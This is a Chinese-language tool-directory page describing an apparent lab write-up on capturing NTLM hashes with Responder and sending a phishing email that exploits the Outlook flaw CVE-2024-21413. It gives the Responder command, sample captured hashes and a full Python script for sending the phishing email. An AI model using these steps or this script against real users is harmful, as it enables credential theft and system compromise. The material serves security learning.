Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413 — 演示通过 Responder 捕获 NTLM 哈希,并执行利用 CVE-2024-21413 的网络钓鱼电子邮件以入侵系统。 | Kitploit
工具/GitHubGitHub/artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413
OSINT (开源情报)密码破解侦察漏洞利用钓鱼攻击社会工程学学习与教育实验室与实践
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413

Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

演示通过 Responder 捕获 NTLM 哈希,并执行利用 CVE-2024-21413 的网络钓鱼电子邮件以入侵系统。

查看仓库
81年前尚未审核

项目目标: 该项目旨在演示如何使用各种工具在网络上捕获用户的NTLM哈希值,以及通过电子邮件执行钓鱼攻击。这展示了如何利用网络身份验证漏洞和钓鱼方法来入侵系统。

过程描述

  1. 使用Responder捕获NTLM哈希值 首先,我使用Responder工具在网络上捕获身份验证哈希值。Responder能够拦截诸如LLMNR、NBT-NS和MDNS等查询,以收集用户的NTLM哈希值。这是通过捕获的哈希值获取系统访问权限的攻击中的重要一步。

我运行了以下命令来启动Responder:

root@ip-10-10-192-145:~# sudo responder -I ens5

我将Responder配置为在ens5接口上监听。它立即开始拦截身份验证请求,使我能够查看网络上用户的NTLM哈希值,例如THM-MONIKERLINK\tryhackme和WORKGROUP\Administrator。以下是捕获哈希值时输出的样子:

[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB

然后,这些哈希值可以用于暴力破解或哈希攻击等攻击。

  1. 利用漏洞发送钓鱼邮件 接下来,我创建了一封包含恶意文件链接的钓鱼邮件。使用带有smtplib库的Python脚本,我将邮件发送到受害者的地址。该邮件包含一个看似安全的HTML链接,但实际上指向一个旨在利用漏洞的文件。

邮件中的钓鱼链接如下所示:

Click me

以下是用于发送钓鱼邮件的完整Python脚本:

import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr

sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")

html_content = """\

Click me

"""

message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email

msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)

server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()

try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)

try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()

该脚本发送一封带有恶意链接的邮件,该链接可能利用CVE-2024-21413漏洞。

结果 作为结果,我能够演示两个关键方面:

使用Responder工具捕获NTLM哈希值,这是攻击网络身份验证的关键步骤。

通过Python脚本利用电子邮件进行钓鱼和漏洞利用。发送带有恶意链接的钓鱼邮件可以欺骗用户,并导致系统入侵。

该项目展示了如何利用网络漏洞和钓鱼攻击来获取系统访问权限。同时,也强调了通过强身份验证方法和电子邮件流量过滤来防御此类攻击的重要性。

下载工具